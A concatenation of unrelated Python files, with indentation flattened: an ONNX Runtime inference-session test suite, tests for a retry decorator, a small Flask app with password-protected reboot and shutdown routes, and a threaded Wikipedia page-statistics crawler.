result = cuda.cuCtxGetDevice(ctypes.byref(device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuCtxGetDevice failed with error code %d: %s" % (result, error_str.value.decode()))
self.assertEqual(result, CUDA_SUCCESS)
self.assertEqual(i, device.value)
def runAdvancedTest():
num_device = getCudaDeviceCount()
if num_device < 0:
return
# Configure session to be ready to run on all available cuda devices
for i in range(num_device):
setDeviceIdTest(i)
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# configuring the session with invalid option values should fail
with self.assertRaises(RuntimeError):
option = {'device_id': num_device}
sess.set_providers(['CUDAExecutionProvider'], [option])
option = {'device_id': 'non_legit_value'}
sess.set_providers(['CUDAExecutionProvider'], [option])
# configuring the session with an unrecognized option should have no effect
option = {'device_id': 0}
sess.set_providers(['CUDAExecutionProvider'], [option])
option = {'non_legit_option': num_device}
sess.set_providers(['CUDAExecutionProvider'], [option])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
libnames = ('libcuda.so', 'libcuda.dylib', 'cuda.dll')
for libname in libnames:
try:
cuda = ctypes.CDLL(libname)
runBaseTest1()
runBaseTest2()
runAdvancedTest()
except OSError:
continue
else:
break
else:
runBaseTest1()
runBaseTest2()
# raise OSError("could not load any of: " + ' '.join(libnames))
def testInvalidSetProviders(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
sess.set_providers(['InvalidProvider'])
self.assertTrue(
'[\'InvalidProvider\'] does not contain a subset of available providers' in str(context.exception))
def testSessionProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
# create session from scratch, but constrain it to only use the CPU.
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testRunModel(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelFromBytes(self):
with open(get_name("mul_1.onnx"), "rb") as f:
content = f.read()
sess = onnxrt.InferenceSession(content)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2Contiguous(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)[:, [1, 0]]
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
xcontiguous = np.ascontiguousarray(x)
rescontiguous = sess.run([output_name], {input_name: xcontiguous})
np.testing.assert_allclose(output_expected, rescontiguous[0], rtol=1e-05, atol=1e-08)
def testRunModelMultipleThreads(self):
available_providers = onnxrt.get_available_providers()
# Skip this test for a "pure" DML onnxruntime python wheel. We keep this test enabled for instances where both DML and CUDA
# EPs are available (Windows GPU CI pipeline has this config) - this test will pass because CUDA has higher precedence than DML
# and the nodes are assigned to only the CUDA EP (which supports this test)
if ('DmlExecutionProvider' in available_providers and not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelMultipleThreads as the DML EP does not support calling Run() on different threads using the same session object ")
else:
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "MultiThreadsTest"
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
ro1 = onnxrt.RunOptions()
ro1.logid = "thread1"
t1 = threading.Thread(target=self.run_model, args=(sess, ro1))
ro2 = onnxrt.RunOptions()
ro2.logid = "thread2"
t2 = threading.Thread(target=self.run_model, args=(sess, ro2))
t1.start()
t2.start()
t1.join()
t2.join()
def testListAsInput(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
res = sess.run([], {input_name: x.tolist()})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testStringListAsInput(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=np.str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
res = sess.run([], {x_name: x.tolist()})
np.testing.assert_equal(x, res[0])
def testRunDevice(self):
device = onnxrt.get_device()
self.assertTrue('CPU' in device or 'GPU' in device)
def testRunModelSymbolicInput(self):
sess = onnxrt.InferenceSession(get_name("matmul_2.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
# Input X has an unknown dimension.
self.assertEqual(input_shape, ['None', 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
# Output X has an unknown dimension.
self.assertEqual(output_shape, ['None', 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testBooleanInputs(self):
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=np.bool)
b = np.array([[True, False], [True, False]], dtype=np.bool)
# input1:0 is first in the protobuf, and input:0 is second
# and we maintain the original order.
a_name = sess.get_inputs()[0].name
self.assertEqual(a_name, "input1:0")
a_shape = sess.get_inputs()[0].shape
self.assertEqual(a_shape, [2, 2])
a_type = sess.get_inputs()[0].type
self.assertEqual(a_type, 'tensor(bool)')
b_name = sess.get_inputs()[1].name
self.assertEqual(b_name, "input:0")
b_shape = sess.get_inputs()[1].shape
self.assertEqual(b_shape, [2, 2])
b_type = sess.get_inputs()[0].type
self.assertEqual(b_type, 'tensor(bool)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(bool)')
output_expected = np.array([[True, False], [False, False]], dtype=np.bool)
res = sess.run([output_name], {a_name: a, b_name: b})
np.testing.assert_equal(output_expected, res[0])
def testStringInput1(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=np.str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testStringInput2(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['Olá', '你好', '여보세요', 'hello'], dtype=np.unicode).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputBytes(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test']).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0].astype('|S8'))
def testInputObject(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], object).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputVoid(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test'], np.void).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
expr = np.array([['this\x00\x00\x00\x00', 'is\x00\x00\x00\x00\x00\x00'], ['identity', 'test\x00\x00\x00\x00']],
dtype=object)
np.testing.assert_equal(expr, res[0])
def testRaiseWrongNumInputs(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=np.bool)
res = sess.run([], {'input:0': a})
self.assertTrue('Model requires 2 inputs' in str(context.exception))
def testModelMeta(self):
model_path = "../models/opset8/test_squeezenet/model.onnx"
if not os.path.exists(model_path):
return
sess = onnxrt.InferenceSession(model_path)
modelmeta = sess.get_modelmeta()
self.assertEqual('onnx-caffe2', modelmeta.producer_name)
self.assertEqual('squeezenet_old', modelmeta.graph_name)
self.assertEqual('', modelmeta.domain)
self.assertEqual('', modelmeta.description)
def testProfilerWithSessionOptions(self):
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess.run([], {'X': x})
profile_file = sess.end_profiling()
tags = ['pid', 'dur', 'ts', 'ph', 'X', 'name', 'args']
with open(profile_file) as f:
lines = f.readlines()
self.assertTrue('[' in lines[0])
for i in range(1, 8):
for tag in tags:
self.assertTrue(tag in lines[i])
self.assertTrue(']' in lines[8])
def testProfilerGetStartTimeNs(self):
def getSingleSessionProfilingStartTime():
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
return sess.get_profiling_start_time_ns()
# Get 1st profiling's start time
start_time_1 = getSingleSessionProfilingStartTime()
# Get 2nd profiling's start time
start_time_2 = getSingleSessionProfilingStartTime()
# Get 3rd profiling's start time
start_time_3 = getSingleSessionProfilingStartTime()
# Chronological profiling's start time
self.assertTrue(start_time_1 <= start_time_2 <= start_time_3)
def testGraphOptimizationLevel(self):
opt = onnxrt.SessionOptions()
# the default should be to enable all optimizations (ORT_ENABLE_ALL)
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)
opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED)
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), sess_options=opt)
a = np.array([[True, True], [False, False]], dtype=np.bool)
b = np.array([[True, False], [True, False]], dtype=np.bool)
res = sess.run([], {'input1:0': a, 'input:0': b})
def testSequenceLength(self):
sess = onnxrt.InferenceSession(get_name("sequence_length.onnx"))
x = [
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3))
]
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'seq(tensor(float))')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(int64)')
output_expected = np.array(2, dtype=np.int64)
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testSequenceConstruct(self):
sess = onnxrt.InferenceSession(get_name("sequence_construct.onnx"))
self.assertEqual(sess.get_inputs()[0].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "tensor1")
self.assertEqual(sess.get_inputs()[1].name, "tensor2")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [
np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
]
res = sess.run(
[output_name], {
"tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
})
np.testing.assert_array_equal(output_expected, res[0])
def testSequenceInsert(self):
opt = onnxrt.SessionOptions()
opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL
sess = onnxrt.InferenceSession(get_name("sequence_insert.onnx"), sess_options=opt)
self.assertEqual(sess.get_inputs()[0].type, 'seq(tensor(int64))')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "input_seq")
self.assertEqual(sess.get_inputs()[1].name, "tensor")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))]
res = sess.run([output_name], {
"tensor": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"input_seq": []
})
np.testing.assert_array_equal(output_expected, res[0])
def testOrtExecutionMode(self):
opt = onnxrt.SessionOptions()
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL)
opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL)
def testLoadingSessionOptionsFromModel(self):
try:
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(1)
sess = onnxrt.InferenceSession(get_name("model_with_valid_ort_config_json.onnx"))
session_options = sess.get_session_options()
self.assertEqual(session_options.inter_op_num_threads, 5) # from the ORT config
self.assertEqual(session_options.intra_op_num_threads, 2) # from the ORT config
self.assertEqual(session_options.execution_mode,
onnxrt.ExecutionMode.ORT_SEQUENTIAL) # default option (not from the ORT config)
self.assertEqual(session_options.graph_optimization_level,
onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL) # from the ORT config
self.assertEqual(session_options.enable_profiling, True) # from the ORT config
except Exception:
raise
finally:
# Make sure the usage of the feature is disabled after this test
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(0)
def testSessionOptionsAddFreeDimensionOverrideByDenotation(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_denotation("DATA_BATCH", 3)
so.add_free_dimension_override_by_denotation("DATA_CHANNEL", 5)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# Free dims with denotations - "DATA_BATCH" and "DATA_CHANNEL" have values assigned to them.
self.assertEqual(input_shape, [3, 5, 5])
def testSessionOptionsAddFreeDimensionOverrideByName(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_name("Dim1", 4)
so.add_free_dimension_override_by_name("Dim2", 6)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# "Dim1" and "Dim2" have values assigned to them.
self.assertEqual(input_shape, [4, 6, 5])
def testSessionOptionsAddConfigEntry(self):
so = onnxrt.SessionOptions()
key = "CONFIG_KEY"
val = "CONFIG_VAL"
so.add_session_config_entry(key, val)
self.assertEqual(so.get_session_config_entry(key), val)
def testInvalidSessionOptionsConfigEntry(self):
so = onnxrt.SessionOptions()
invalid_key = "INVALID_KEY"
with self.assertRaises(RuntimeError) as context:
so.get_session_config_entry(invalid_key)
self.assertTrue(
'SessionOptions does not have configuration with key: ' + invalid_key in str(context.exception))
def testSessionOptionsAddInitializer(self):
# Create an initializer and add it to a SessionOptions instance
so = onnxrt.SessionOptions()
# This initializer is different from the actual initializer in the model for "W"
ortvalue_initializer = onnxrt.OrtValue.ortvalue_from_numpy(np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32))
# The user should manage the life cycle of this OrtValue and should keep it in scope
# as long as any session that is going to be reliant on it is in scope
so.add_initializer("W", ortvalue_initializer)
# Create an InferenceSession that only uses the CPU EP and validate that it uses the
# initializer provided via the SessionOptions instance (overriding the model initializer)
# We only use the CPU EP because the initializer we created is on CPU and we want the model to use that
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), so, ['CPUExecutionProvider'])
res = sess.run(["Y"], {"X": np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)})
self.assertTrue(np.array_equal(res[0], np.array([[2.0, 2.0], [12.0, 12.0], [30.0, 30.0]], dtype=np.float32)))
def testRegisterCustomOpsLibrary(self):
if sys.platform.startswith("win"):
shared_library = 'custom_op_library.dll'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
elif sys.platform.startswith("darwin"):
shared_library = 'libcustom_op_library.dylib'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
else:
shared_library = './libcustom_op_library.so'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_op_library", "custom_op_test.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
so1 = onnxrt.SessionOptions()
so1.register_custom_ops_library(shared_library)
# Model loading successfully indicates that the custom op node could be resolved successfully
sess1 = onnxrt.InferenceSession(custom_op_model, so1)
# Run with input data
input_name_0 = sess1.get_inputs()[0].name
input_name_1 = sess1.get_inputs()[1].name
output_name = sess1.get_outputs()[0].name
input_0 = np.ones((3,5)).astype(np.float32)
input_1 = np.zeros((3,5)).astype(np.float32)
res = sess1.run([output_name], {input_name_0: input_0, input_name_1: input_1})
output_expected = np.ones((3,5)).astype(np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
# Create an alias of SessionOptions instance
# We will use this alias to construct another InferenceSession
so2 = so1
# Model loading successfully indicates that the custom op node could be resolved successfully
sess2 = onnxrt.InferenceSession(custom_op_model, so2)
# Create another SessionOptions instance with the same shared library referenced
so3 = onnxrt.SessionOptions()
so3.register_custom_ops_library(shared_library)
sess3 = onnxrt.InferenceSession(custom_op_model, so3)
def testOrtValue(self):
numpy_arr_input = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
numpy_arr_output = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
def test_session_with_ortvalue_input(ortvalue):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
res = sess.run(["Y"], {"X": ortvalue})
self.assertTrue(np.array_equal(res[0], numpy_arr_output))
ortvalue1 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input)
self.assertEqual(ortvalue1.device_name(), "cpu")
self.assertEqual(ortvalue1.shape(), [3, 2])
self.assertEqual(ortvalue1.data_type(), "tensor(float)")
self.assertEqual(ortvalue1.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue1)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
ortvalue2 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input, 'cuda', 0)
self.assertEqual(ortvalue2.device_name(), "cuda")
self.assertEqual(ortvalue2.shape(), [3, 2])
self.assertEqual(ortvalue2.data_type(), "tensor(float)")
self.assertEqual(ortvalue2.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue2)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
def testRunModelWithCudaCopyStream(self):
available_providers = onnxrt.get_available_providers()
if (not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelWithCudaCopyStream when CUDA is not available")
else:
# adapted from issue #4829 for a race condition when copy is not on default stream
# note:
# 1. if there are intermittent failures in this test, something is wrong
# 2. it's easier to repro on slower GPU (like M60, Geforce 1070)
# to repro #4829, uncomment the line below to run copy in a separate stream
#onnxrt.capi._pybind_state.set_do_copy_in_default_stream(False)
session = onnxrt.InferenceSession(get_name("issue4829.onnx"))
shape = np.array([2,2], dtype=np.int64)
for iteration in range(100000):
result = session.run(output_names=['output'], input_feed={'shape': shape})
if __name__ == '__main__':
unittest.main()
|
test_retry.py
|
from datetime import datetime
from threading import Thread
from time import sleep
import pytest
import retry
exception_message = 'testing exceptions'
def foo(bar):
if bar < 0:
raise ArithmeticError(exception_message)
return bar
def test_success_criteria():
"""Success criteria successfully raises MaximumRetriesExceeded"""
foo_with_success = retry.retry(success=lambda x: x > 0)(foo)
with pytest.raises(retry.MaximumRetriesExceeded):
foo_with_success(0)
def test_exception_criteria():
"""Exceptions specified are raised on MaximumRetriesExceeded"""
foo_with_exception = retry.retry(exceptions=(ArithmeticError,))(foo)
with pytest.raises(ArithmeticError) as exc_info:
foo_with_exception(-1)
assert exception_message in str(exc_info.value)
def test_execution():
"""Expected execution of a successful runstill works"""
foo_with_both = retry.retry(
exceptions=(ArithmeticError,), success=lambda x: x > 0)(foo)
assert foo_with_both(1) == 1
def test_interval():
"""Interval expected is the interval to complete an action"""
def _success_interval(in_dict):
in_dict['num'] += 1
return in_dict['num']
baz_with_interval = retry.retry(
success=lambda x: x > 5, interval=1)(_success_interval)
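# Success requires the counter to exceed 5, i.e. six calls, so at least five 1-second retry intervals should elapse.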
start = datetime.now()
baz_with_interval({'num': 0})
elapsed = datetime.now() - start
assert elapsed.seconds >= 5
def test_invalid_parameters():
"""The exceptions and success parameter can not both be None"""
with pytest.raises(TypeError):
retry.retry(exceptions=None, success=None)(foo)
def test_unsuccessful_timeout():
"""Unsuccessful functions with a timeout work"""
foo_with_timeout = retry.retry(
success=lambda x: x > 0, timeout=5, interval=1)(foo)
with pytest.raises(retry.MaximumTimeoutExceeded):
foo_with_timeout(-1)
def test_successful_timeout():
"""Success with a timeout still works"""
def _success_timeout(in_dict):
in_dict['num'] += 1
return in_dict['num']
try:
_test_func = retry.retry(
success=lambda x: x == 5, timeout=10, interval=1)(
_success_timeout)
_test_func({'num': 0})
except retry.MaximumTimeoutExceeded:
pytest.fail('Expected the timeout not to be exceeded')
def test_disarm_signal_on_success():
"""Success with a timeout disarms signal"""
_test_func = retry.retry(success=lambda x: True, timeout=1, interval=0.5)(foo)
_test_func(1)
sleep(1.2)
def test_successful_thread():
"""Success with function as thread"""
retryed = []
@retry.retry(timeout=1, success=lambda x: len(x) == 3)
def f(retryed):
retryed.append(0)
return retryed
t = Thread(target=f, args=[retryed])
t.start()
t.join()
assert 3 == len(retryed)
def test_unsuccessful_thread():
"""Unsuccessful with function as thread, timed out"""
retryed = []
def foo(retryed):
@retry.retry(timeout=1, success=lambda x: False)
def bar(retryed):
sleep(0.2)
retryed.append(0)
with pytest.raises(retry.MaximumTimeoutExceeded):
bar(retryed)
t = Thread(target=foo, args=[retryed])
t.start()
t.join()
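# With a 1 s timeout and ~0.2 s of sleep per attempt, roughly 3-5 attempts are expected before the timeout fires.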
assert 3 <= len(retryed) <= 5
|
rasprest.py
|
import os
from threading import Thread
import time
from subprocess import run
from flask import Flask, request
app = Flask(__name__)
passwd = open(os.path.expanduser('~/.passwd.txt')).readlines()[0].strip()
class Command:
'''
Given a command argument list, run command after seconds delay.
'''
def __init__(self, command_list, seconds=10):
self.command_list = command_list
self.seconds = seconds
def __call__(self):
time.sleep(self.seconds)
run(self.command_list)
def check_password(password):
return passwd == password
def auth(f):
def wrapped_auth():
password = request.args.get('password')
if check_password(password):
return f()
else:
return 'Unauthorized', 401
wrapped_auth.__name__ = f.__name__
return wrapped_auth
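# Example request (hypothetical host/port for Flask's default dev server):
#   curl 'http://localhost:5000/reboot?password=<contents of ~/.passwd.txt>'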
@app.route('/reboot')
@auth
def reboot():
Thread(target=Command(['sudo', 'reboot'])).start()
return 'Rebooting...'
@app.route('/shutdown')
@auth
def shutdown():
Thread(target=Command(['sudo', 'poweroff'])).start()
return 'Shutting down...'
if __name__ == '__main__':
app.run()
|
wikicrawl.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 31 15:32:00 2017
@author: dataquanty
"""
import wikipedia
from csv import reader
import time
import threading
import sys
import warnings
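# Page identifiers are assumed to follow the Kaggle web-traffic format, e.g.
# 'SomeArticle_en.wikipedia.org_all-access_spider'; rsplit('_', 3) then separates
# the article title from the language-bearing suffix used for set_lang().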
def getWikipediaStats(page):
pagelmt = page.rsplit('_',3)
try:
wikipedia.set_lang(pagelmt[1][:2])
wikipage = wikipedia.page(pagelmt[0],preload=False)
properties = ['\"' + str(page).replace('\"','\"\"') + '\"']
properties.append(str(len(wikipage.summary)))
properties.append(str(len(wikipage.categories)))
properties.append(str(len(wikipage.images)))
properties.append(str(len(wikipage.links)))
properties.append(str(len(wikipage.references)))
#properties.append(str(len(wikipage.sections)))
except Exception:
properties = ['\"' + str(page).replace('\"','\"\"') + '\"']
properties = properties + ['','','','','']
strout = ','.join(properties) + '\n'
sys.stdout.write(strout)
t1 = time.time()
pages = []
with open('train_1_trail64.csv','r') as f:
i = 0
ff = reader(f, delimiter=',', quotechar='"')
for l in ff:
i+=1
if i==1:
sys.stdout.write('Page,summary,cat,images,links,refs\n')
else:
pages.append(l[0])
if i%100==0:
threads = [threading.Thread(target=getWikipediaStats, args=(page,)) for page in pages]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
pages = []
